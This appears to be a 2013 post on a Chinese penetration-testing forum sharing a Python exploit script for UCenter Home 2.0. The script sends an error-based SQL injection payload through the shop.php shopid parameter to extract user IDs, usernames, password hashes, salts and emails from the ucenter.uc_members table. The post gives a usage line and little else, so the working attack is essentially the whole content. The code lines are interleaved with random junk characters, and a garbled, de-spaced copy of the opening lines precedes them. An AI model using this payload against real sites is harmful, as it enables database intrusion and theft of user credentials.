找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2773|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
, a; x6 A$ x/ q
" n) d! B5 c, O+ B9 Q4 K( z/ m1 A( [1 {4 f+ {; }
#!/usr/bin/env python  
6 B; p! Z7 M, x  Q
+ \. y4 R. q0 q5 I# N, ]import sys  
, x# \4 G+ P1 @1 D- o& Qimport urllib2  
7 s' Y. G; g- w6 _, a* Vimport re  
/ a* n/ l- A* T- U: ^ ) C. y& _; z0 R4 v) \
def info():  ) j+ j8 O* J% M
    print 'From:http://www.exploit-db.com/exploits/14997/'
$ e" _7 Q  h. J# [' W    print 'http://www.hake.cc/Web_loudong/' 0 v* H- D/ L4 k; X5 y/ N. D. L
    print 'changed:qiaoy'  
9 W. G" B, \2 U) F* F1 ^9 C    print 'exp:'  4 w0 J9 j: Z) Y7 C: \3 H' z
    print ' ./UCenter_Home_2.0.py site'  
# f/ W  e  F+ t7 M2 V/ M7 r. J  I ; ^: X( C/ U$ H0 p9 H: E
def main():  ) y  t4 c$ s( \$ H3 ~
    if len(sys.argv) != 2:  4 {9 x  w8 v: _6 q
        info()  & _- z, G- x  ]4 F
    else:  6 [2 T8 w  I8 ~: b- Y6 y0 w0 Q6 g
        site = sys.argv[1]  
" `+ r$ F1 v3 e        if site[0:7] == 'http://':  ! A* ~" P, X; d1 O, W
            sitesite =site  
" c( o! J& W1 x4 c        elif site[0:8] == 'https://':  ' e: C" M# y1 m8 N1 A
            sitesite = site  9 H: b- N% `1 L) l
        else:  
. p! `2 F" ~+ z6 v% U' x            site = 'http://'+site  
" }7 y6 G: h. K9 S        try:  
* J4 p+ t: {( ~, q2 S            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
! e9 u4 J& _7 L' H! x% D9 j            Value = urllib2.urlopen(url).read()  
7 r1 N: s3 w* T8 P            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  % V- ?) @- {6 \: ^
            hacked = Msg.split(':')  
. P/ G. i/ J( D& k, A4 K: S8 N5 z. r            print 'Name:    '+hacked[1]  : w) [; Q$ `( K; f# O. j2 I7 \
            print 'Passwd:  '+hacked[2]  ! B0 V5 H/ ?5 ], T
            print 'salt:    '+hacked[3]  $ ?' i$ M% p7 \' Y
            print 'email:   '+hacked[4]  + n; v" G& w* \
        except:  3 P2 G! e4 @8 o  M- x9 |; \# j+ s
            print 'Sorry,I can\'t work............'  1 U  S. w) e4 P# M* l9 C# y8 _

6 [: n: t$ \* q. F/ Jif __name__ == '__main__':  4 j" [% T" U9 v' ]
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表